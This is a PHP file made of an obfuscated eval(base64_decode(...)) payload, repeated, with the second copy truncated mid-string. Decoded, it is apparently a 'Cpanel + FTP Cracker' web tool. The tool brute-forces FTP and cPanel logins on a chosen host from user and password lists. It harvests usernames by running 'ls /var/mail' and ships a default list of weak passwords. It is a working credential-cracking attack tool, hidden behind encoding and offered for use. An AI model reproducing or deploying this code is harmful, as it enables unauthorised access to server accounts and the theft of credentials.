eval(base64_decode('aWYoJGF1dGggPT0gMSkgew0KaWYgKCFpc3NldCgkX1NFUlZFUlsnUEhQX0FVVEhfVVNFUiddKSB8fCBtZDUoJF9TRVJWRVJbJ1BIUF9BVVRIX1VTRVInXSkhPT0kbmFtZSB8fCBtZDUoJF9TRVJWRVJbJ1BIUF9BVVRIX1BXJ10pIT09JHBhc3MpDQogICB7DQogICBoZWFkZXIoJ1dXVy1BdXRoZW50aWNhdGU6IEJhc2ljIHJlYWxtPSIwZGF5LmNvbSInKTsNCiAgIGhlYWRlcignSFRUUC8xLjAgNDAxIFVuYXV0aG9yaXplZCcpOw0KICAgZXhpdCgiPGI+V3JvbmcgdXNlciBvciBwYXNzICEhPC9iPiIpOw0KICAgfQ0KfQ0KDQokY29ubmVjdF90aW1lb3V0PTU7DQpzZXRfdGltZV9saW1pdCgwKTsNCiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsNCiR1c2Vycz0kX1JFUVVFU1RbJ3VzZXJzJ107DQokcGFzcz0kX1JFUVVFU1RbJ3Bhc3N3b3JkcyddOw0KJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOw0KJGNyYWNrdHlwZT0kX1JFUVVFU1RbJ2NyYWNrdHlwZSddOw0KDQoNCmlmKCR0YXJnZXQgPT0gIiIpew0KJHRhcmdldCA9ICJsb2NhbGhvc3QiOw0KfQ0KDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIj4NCjwvaGVhZD4NCjx0aXRsZT5DcGFuZWwgKyBGVFAgQ3JhY2tlcjwvdGl0bGU+DQo8Ym9keSB0ZXh0PSIjMDBGRjAwIiBiZ2NvbG9yPSIjMDAwMDAwIiB2bGluaz0iIzAwODAwMCIgbGluaz0iIzAwODAwMCIgYWxpbms9IiMwMDgwMDAiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICMwMDAwMDAiPg0KPHRhYmxlIHdpZHRoPSI2NyUiIHN0eWxlPSJib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj4NCiA8Zm9udCBmYWNlPSJDb3VyaWVyIE5ldyIgc2l6ZT00IGNvbG9yPXllbGxvdz5DcGFuZWwgKyBGVFAgQ3JhY2tlcjwvZm9udD4NCjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8YnIgLz4NCjw/cGhwDQpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpew0KJGNoID0gY3VybF9pbml0KCk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAiZnRwOi8vJGhvc3QiKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSFRUUEFVVEgsIENVUkxBVVRIX0JBU0lDKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GVFBMSVNUT05MWSwgMSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUlBXRCwgIiR1c2VyOiRwYXNzIik7DQpjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAkdGltZW91dCk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRkFJTE9ORVJST1IsIDEpOw0KJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsNCmlmICggY3VybF9lcnJubygkY2gpID09IDI4ICkgeyBwcmludCAiPGI+PGZvbnQgZmFjZT1cIlZlcmRhbmFcIiBzdHlsZT1cImZvbnQtc2l6ZTogOXB0XCI+DQo8Zm9udCBjb2xvcj1cIiNBQTAwMDBcIj5FcnJvciA6PC9mb250PiA8Zm9udCBjb2xvcj1cIiMwMDgwMDBcIj5Db25uZWN0aW9uIFRpbWVvdXQNClBsZWFzZSBDaGVjayBUaGUgVGFyZ2V0IEhvc3RuYW1lIC48L2ZvbnQ+PC9mb250PjwvYj48L3A+IjtleGl0O30NCmVsc2VpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAwICl7DQpwcmludCAiPHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+PHRyPjx0ZCBhbGlnbj1jZW50ZXI+PGI+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIGNvbG9yPVwiI0ZGMDAwMFwiPlsrXTwvZm9udD48Zm9udD4NCkNyYWNraW5nIFN1Y2Nlc3MgV2l0aCBVc2VybmFtZSAoPC9mb250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiR1c2VyPC9mb250Pjxmb250PikgYW5kIFBhc3N3b3JkICg8L2ZvbnQ+PGZvbnQgY29sb3I9XCIjRkYwMDAwXCI+JHBhc3M8L2ZvbnQ+PGZvbnQgY29sb3I9XCIjMDA4MDAwXCI+KTwvZm9udD48L2I+PC90ZD48L3RyPjwvdGFibGU+Ijt9Y3VybF9jbG9zZSgkY2gpO30NCmZ1bmN0aW9uIGNwYW5lbF9jaGVjaygkaG9zdCwkdXNlciwkcGFzcywkdGltZW91dCl7DQokY2ggPSBjdXJsX2luaXQoKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICJodHRwOi8vJGhvc3Q6MjA4MiIpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IVFRQQVVUSCwgQ1VSTEFVVEhfQkFTSUMpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOw0KY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsNCiRkYXRhID0gY3VybF9leGVjKCRjaCk7DQppZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApIHsgcHJpbnQgIjxiPjxmb250IGZhY2U9XCJWZXJkYW5hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiPg0KPGZvbnQgY29sb3I9XCIjQUEwMDAwXCI+RXJyb3IgOjwvZm9udD4gPGZvbnQgY29sb3I9XCIjMDA4MDAwXCI+Q29ubmVjdGlvbiBUaW1lb3V0DQpQbGVhc2UgQ2hlY2sgVGhlIFRhcmdldCBIb3N0bmFtZSAuPC9mb250PjwvZm9udD48L2I+PC9wPiI7ZXhpdDt9DQplbHNlaWYgKCBjdXJsX2Vycm5vKCRjaCkgPT0gMCApew0KcHJpbnQgIjx0YWJsZSB3aWR0aD0nNjclJyBzdHlsZT0nYm9yZGVyOiAycHggZGFzaGVkICMxRDFEMUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAnPjx0cj48dGQgYWxpZ249Y2VudGVyPjxiPjxmb250IGZhY2U9XCJUYWhvbWFcIiBjb2xvcj1cIiNGRjAwMDBcIj5bK108L2ZvbnQ+PGZvbnQ+DQpDcmFja2luZyBTdWNjZXNzIFdpdGggVXNlcm5hbWUgKDwvZm9udD48Zm9udCBjb2xvcj1cIiNGRjAwMDBcIj4kdXNlcjwvZm9udD48Zm9udD4pIGFuZCBQYXNzd29yZCAoPC9mb250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiRwYXNzPC9mb250Pjxmb250IGNvbG9yPVwiIzAwODAwMFwiPik8L2ZvbnQ+PC9iPjwvdGQ+PC90cj48L3RhYmxlPiI7fWN1cmxfY2xvc2UoJGNoKTt9DQppZihpc3NldCgkc3VibWl0KSAmJiAhZW1wdHkoJHN1Ym1pdCkpew0KaWYoZW1wdHkoJHVzZXJzKSAmJiBlbXB0eSgkcGFzcykpeyBwcmludCAiPHA+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHNpemU9XCIyXCI+PGI+PGZvbnQgY29sb3I9XCIjRkYwMDAwXCI+RXJyb3IgOiA8L2ZvbnQ+UGxlYXNlIENoZWNrIFRoZSBVc2VycyBvciBQYXNzd29yZCBMaXN0IEVudHJ5IC4gLiAuPC9iPjwvZm9udD48L3A+IjsgZXhpdDsgfQ0KaWYoZW1wdHkoJHVzZXJzKSl7IHByaW50ICI8cD48Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzInPjxiPjxmb250IGNvbG9yPScjRkYwMDAwJz5FcnJvciA6IDwvZm9udD5QbGVhc2UgQ2hlY2sgVGhlIFVzZXJzIExpc3QgRW50cnkgLiAuIC48L2I+PC9mb250PjwvcD4iOyBleGl0OyB9DQppZihlbXB0eSgkcGFzcykgKXsgcHJpbnQgIjxwPjxmb250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPkVycm9yIDogPC9mb250PlBsZWFzZSBDaGVjayBUaGUgUGFzc3dvcmQgTGlzdCBFbnRyeSAuIC4gLjwvYj48L2ZvbnQ+PC9wPiI7IGV4aXQ7IH07DQokdXNlcmxpc3Q9ZXhwbG9kZSgiXG4iLCR1c2Vycyk7DQokcGFzc2xpc3Q9ZXhwbG9kZSgiXG4iLCRwYXNzKTsNCnByaW50ICI8Yj48Zm9udCBmYWNlPVwiVGFob21hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiIGNvbG9yPVwiIzAwODAwMFwiPlt+XSM8L2ZvbnQ+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHN0eWxlPVwiZm9udC1zaXplOiA5cHRcIiBjb2xvcj1cIiNGRjAwMDBcIj4NCkNyYWNraW5nIFByb2Nlc3MgU3RhcnRlZCwgUGxlYXNlIFdhaXQgLi4uPC9mb250PjwvYj48YnI+PGJyPiI7DQpmb3JlYWNoICgkdXNlcmxpc3QgYXMgJHVzZXIpIHsNCiRwdXJldXNlciA9IHRyaW0oJHVzZXIpOw0KZm9yZWFjaCAoJHBhc3NsaXN0IGFzICRwYXNzd29yZCApIHsNCiRwdXJlcGFzcyA9IHRyaW0oJHBhc3N3b3JkKTsNCmlmKCRjcmFja3R5cGUgPT0gImZ0cCIpew0KZnRwX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRwdXJlcGFzcywkY29ubmVjdF90aW1lb3V0KTsNCn0NCmlmICgkY3JhY2t0eXBlID09ICJjcGFuZWwiKQ0Kew0KY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRwdXJlcGFzcywkY29ubmVjdF90aW1lb3V0KTsNCn0NCn0NCn0NCn0NCj8+PD8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKCRfUE9TVFsnZW50ZXInXSl7DQplY2hvICI8Zm9ybSBtZXRob2Q9UE9TVCBhY3Rpb249Jyc+PHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkPiA8YnIgLz4NCiAgICAgICAgPHAgYWxpZ249J2NlbnRlcic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPg0KICAgICAgICAgICAgICAgIDxzcGFuIGxhbmc9J2VuLXVzJz5TZXJ2ZXIncyBJUDwvc3Bhbj4gOjwvZm9udD48Zm9udCBmYWNlPSdBcmlhbCc+DQogICAgICAgIDwvZm9udD48Zm9udCBmYWNlPSdBcmlhbCcgY29sb3I9JyNDQzAwMDAnPg0KICAgICAgICA8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndGFyZ2V0JyBzaXplPScxNicgdmFsdWU9JHRhcmdldCBzdHlsZT0nYm9yZGVyOiAycHggZGFzaGVkICMxRDFEMUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAnPjwvZm9udD48L2I+PC9wPg0KICAgICAgICA8cCBhbGlnbj0nY2VudGVyJz48Yj48Zm9udCBjb2xvcj0nIzAwODAwMCcgZmFjZT0nVGFob21hJyBzaXplPScyJz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgPC9mb250PjwvYj48L3A+DQogICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGFsaWduPSdjZW50ZXInPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9JzU1JScgc3R5bGU9J2JvcmRlcjogMnB4IGRhc2hlZCAjMUQxRDFEOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOyBjb2xvcjojQzBDMEMwJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgYWxpZ249J2NlbnRlcic+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBsYW5nPSdlbi11cyc+PGZvbnQgY29sb3I9JyNGRjAwMDAnPjxiPlVzZXJuYW1lPC9iPjwvZm9udD48L3NwYW4+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwIGFsaWduPSdjZW50ZXInPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gbGFuZz0nZW4tdXMnPjxmb250IGNvbG9yPScjRkYwMDAwJz48Yj5QYXNzd29yZDwvYj48L2ZvbnQ+PC9zcGFuPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCg0KICAgICAgICAgICAgICAgICAgICAgICAgPHAgYWxpZ249J2NlbnRlcic+Jm5ic3A7PHRleHRhcmVhIHJvd3M9JzIwJyBuYW1lPSd1c2VycycgY29scz0nMjUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+IjsNCg0KICAgICAgc3lzdGVtKCdscyAvdmFyL21haWwnKTsNCg0KZWNobyAiPC90ZXh0YXJlYT48dGV4dGFyZWEgcm93cz0nMjAnIG5hbWU9J3Bhc3N3b3JkcycgY29scz0nMjUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+MTIzMTIzXG4xMjM0NTZcbjEyMzQ1NjdcbjEyMzQ1Njc4XG4xMjM0NTY3ODlcbjE1OTE1OVxuMTEyMjMzXG4zMzIyMTFcbjE0Nzg5NjNcbjE0Nzg5NjMuXG5jcGFuZWxcbnBhc3N3b3JkXG51c2VyXG5wYXNzd2RcbnBhc3N3b3Jkc1xuMTU5MzU3XG4zNTc5NTFcbjExNDQ3N1xucGFzc1xuUGFzc3dvcmQ8L3RleHRhcmVhPjxicj4NCiAgICAgICAgPGJyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxiPiA8Zm9udCBmb250IGNvbG9yPScjRkYwMDAwJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd1ZXNzIG9wdGlvbnM8L2ZvbnQ+PC9iPjxmb250IHN0eWxlPSdmb250LXNpemU6IDEycHQ7JyBzaXplPSctMycgZmFjZT0nVmVyZGFuYSc+PHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Oyc+Jm5ic3A7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9udCBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9J2NyYWNrdHlwZScgdmFsdWU9J2NwYW5lbCcgc3R5bGU9J2ZvbnQtd2VpZ2h0OiA3MDA7JyBjaGVja2VkIHR5cGU9J3JhZGlvJz48L2ZvbnQ+PC9zcGFuPjwvZm9udD48Yj48Zm9udCBzaXplPScyJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ3BhbmVsPC9mb250Pjxmb250IHNpemU9JzInIGNvbG9yPScjY2MwMDAwJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9mb250Pjxmb250IHNpemU9JzInIGNvbG9yPScjRkZGRkZGJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKDIwODIpPC9mb250PjwvYj48Zm9udCBzaXplPScyJyBmYWNlPSdUYWhvbWEnPjxiPiA8L2I+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9udCBzdHlsZT0nZm9udC1zaXplOiAxMnB0Oycgc2l6ZT0nLTMnIGZhY2U9J1ZlcmRhbmEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Oyc+PGZvbnQgZmFjZT0nVGFob21hJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSdjcmFja3R5cGUnIHZhbHVlPSdmdHAnIHN0eWxlPSdmb250LXdlaWdodDogNzAwOycgdHlwZT0ncmFkaW8nPjwvZm9udD48L3NwYW4+PC9mb250Pjxmb250IHN0eWxlPSdmb250LXdlaWdodDogNzAwOycgc2l6ZT0nMicgZmFjZT0nVGFob21hJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZm9udD48c3BhbiBzdHlsZT0nZm9udC13ZWlnaHQ6IDcwMDsnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZvbnQgc2l6ZT0nMicgZmFjZT0nVGFob21hJz5GdHAgPC9mb250Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZvbnQgc2l6ZT0nMicgY29sb3I9JyNGRkZGRkYnIGZhY2U9J1RhaG9tYSc+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoMjEpPC9mb250Pjwvc3Bhbj48L3A+DQogICAgICAgIDxwIGFsaWduPSdjZW50ZXInPjxvcHRpb24gdmFsdWU9J25hbWUnPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOw0KICAgICAgICA8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nICAgQ3JhY2sgaXQgISAgICcgbmFtZT0nc3VibWl0JyBzdHlsZT0nY29sb3I6ICNGRjAwMDA7IGZvbnQtd2VpZ2h0OiBib2xkOyBib3JkZXI6IDFweCBkYXNoZWQgIzMzMzMzMzsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMCc+PC9wPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KDQogICAgPHAgYWxpZ249J2NlbnRlcic+PC90ZD4NCiAgPC90cj4NCiAgPC9mb3JtPg0KICA8dGFibGUgd2lkdGg9JzY3JScgc3R5bGU9J2JvcmRlcjogMnB4IGRhc2hlZCAjMUQxRDFEOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOyBjb2xvcjojQzBDMEMwJz4NCjx0cj48dGQgYWxpZ249Y2VudGVyPg0KIDxmb250IGZhY2U9J0NvdXJpZXIgTmV3JyBzaXplPTIgY29sb3I9eWVsbG93PltDb2RlZCBCeSBDcmF6eV9IYWNrZXJdPGJyIC8+Q29weXJpZ2h0IHJlc2VydmVkIHRvIDBkYXkuY29tIChTZWN1cml0eSBMb3YzcnopPC9mb250Pg0KPC90ZD48L3RyPg0KPC90YWJsZT4NCiAgIjtkaWUoKTsNCn0NCj8+DQogPHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj48Zm9ybSBtZXRob2Q9UE9TVCBhY3Rpb249JycgYWxpZ249Y2VudGVyPjxiciAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPWVudGVyIHZhbHVlPSIgRW50ZXIgIiBzdHlsZT0nY29sb3I6ICNGRjAwMDA7IGZvbnQtd2VpZ2h0OiBib2xkOyBib3JkZXI6IDFweCBkYXNoZWQgIzMzMzMzMzsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMCcgLz48L2Zvcm0+PC90ZD48L3RyPjwvdGFibGU+PGJyIC8+DQoNCg0KPHRhYmxlIHdpZHRoPSI2NyUiIHN0eWxlPSJib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj4NCiA8Zm9udCBmYWNlPSJDb3VyaWVyIE5ldyIgc2l6ZT0yIGNvbG9yPXllbGxvdz5bQ29kZWQgQnkgQ3JhenlfSGFja2VyXTxiciAvPkNvcHlyaWdodCByZXNlcnZlZCB0byAwZGF5LmNvbSAoU2VjdXJpdHkgTG92M3J6KTwvZm9udD4NCjwvdGQ+PC90cj4NCjwvdGFibGU+'));
?>
eval(base64_decode('aWYoJGF1dGggPT0gMSkgew0KaWYgKCFpc3NldCgkX1NFUlZFUlsnUEhQX0FVVEhfVVNFUiddKSB8fCBtZDUoJF9TRVJWRVJbJ1BIUF9BVVRIX1VTRVInXSkhPT0kbmFtZSB8fCBtZDUoJF9TRVJWRVJbJ1BIUF9BVVRIX1BXJ10pIT09JHBhc3MpDQogICB7DQogICBoZWFkZXIoJ1dXVy1BdXRoZW50aWNhdGU6IEJhc2ljIHJlYWxtPSIwZGF5LmNvbSInKTsNCiAgIGhlYWRlcignSFRUUC8xLjAgNDAxIFVuYXV0aG9yaXplZCcpOw0KICAgZXhpdCgiPGI+V3JvbmcgdXNlciBvciBwYXNzICEhPC9iPiIpOw0KICAgfQ0KfQ0KDQokY29ubmVjdF90aW1lb3V0PTU7DQpzZXRfdGltZV9saW1pdCgwKTsNCiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsNCiR1c2Vycz0kX1JFUVVFU1RbJ3VzZXJzJ107DQokcGFzcz0kX1JFUVVFU1RbJ3Bhc3N3b3JkcyddOw0KJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOw0KJGNyYWNrdHlwZT0kX1JFUVVFU1RbJ2NyYWNrdHlwZSddOw0KDQoNCmlmKCR0YXJnZXQgPT0gIiIpew0KJHRhcmdldCA9ICJsb2NhbGhvc3QiOw0KfQ0KDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIj4NCjwvaGVhZD4NCjx0aXRsZT5DcGFuZWwgKyBGVFAgQ3JhY2tlcjwvdGl0bGU+DQo8Ym9keSB0ZXh0PSIjMDBGRjAwIiBiZ2NvbG9yPSIjMDAwMDAwIiB2bGluaz0iIzAwODAwMCIgbGluaz0iIzAwODAwMCIgYWxpbms9IiMwMDgwMDAiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICMwMDAwMDAiPg0KPHRhYmxlIHdpZHRoPSI2NyUiIHN0eWxlPSJib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj4NCiA8Zm9udCBmYWNlPSJDb3VyaWVyIE5ldyIgc2l6ZT00IGNvbG9yPXllbGxvdz5DcGFuZWwgKyBGVFAgQ3JhY2tlcjwvZm9udD4NCjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8YnIgLz4NCjw/cGhwDQpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpew0KJGNoID0gY3VybF9pbml0KCk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAiZnRwOi8vJGhvc3QiKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSFRUUEFVVEgsIENVUkxBVVRIX0JBU0lDKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GVFBMSVNUT05MWSwgMSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUlBXRCwgIiR1c2VyOiRwYXNzIik7DQpjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAkdGltZW91dCk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRkFJTE9ORVJST1IsIDEpOw0KJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsNCmlmICggY3VybF9lcnJubygkY2gpID09IDI4ICkgeyBwcmludCAiPGI+PGZvbnQgZmFjZT1cIlZlcmRhbmFcIiBzdHlsZT1cImZvbnQtc2l6ZTogOXB0XCI+DQo8Zm9udCBjb2xvcj1cIiNBQTAwMDBcIj5FcnJvciA6PC9mb250PiA8Zm9udCBjb2xvcj1cIiMwMDgwMDBcIj5Db25uZWN0aW9uIFRpbWVvdXQNClBsZWFzZSBDaGVjayBUaGUgVGFyZ2V0IEhvc3RuYW1lIC48L2ZvbnQ+PC9mb250PjwvYj48L3A+IjtleGl0O30NCmVsc2VpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAwICl7DQpwcmludCAiPHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+PHRyPjx0ZCBhbGlnbj1jZW50ZXI+PGI+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIGNvbG9yPVwiI0ZGMDAwMFwiPlsrXTwvZm9udD48Zm9udD4NCkNyYWNraW5nIFN1Y2Nlc3MgV2l0aCBVc2VybmFtZSAoPC9mb250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiR1c2VyPC9mb250Pjxmb250PikgYW5kIFBhc3N3b3JkICg8L2ZvbnQ+PGZvbnQgY29sb3I9XCIjRkYwMDAwXCI+JHBhc3M8L2ZvbnQ+PGZvbnQgY29sb3I9XCIjMDA4MDAwXCI+KTwvZm9udD48L2I+PC90ZD48L3RyPjwvdGFibGU+Ijt9Y3VybF9jbG9zZSgkY2gpO30NCmZ1bmN0aW9uIGNwYW5lbF9jaGVjaygkaG9zdCwkdXNlciwkcGFzcywkdGltZW91dCl7DQokY2ggPSBjdXJsX2luaXQoKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICJodHRwOi8vJGhvc3Q6MjA4MiIpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IVFRQQVVUSCwgQ1VSTEFVVEhfQkFTSUMpOw0KY3VybF9zZXR